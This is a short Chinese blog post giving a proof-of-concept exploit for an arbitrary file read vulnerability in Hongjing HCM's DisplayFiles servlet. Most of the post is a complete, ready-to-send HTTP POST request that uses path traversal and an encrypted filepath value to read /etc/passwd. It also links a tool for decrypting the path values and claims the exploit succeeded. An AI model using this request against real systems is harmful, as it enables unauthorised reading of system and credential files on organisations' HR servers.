宏景HCM DisplayFiles任意檔案讀取

都吃泡芙發表於2024-06-14

漏洞復現:

POC:

點選檢視程式碼
POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

漏洞利用成功
image

其中filepath的加密為讀取/etc/passwd:

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

工具地址:https://github.com/wafinfo/DecryptTools
image

相關文章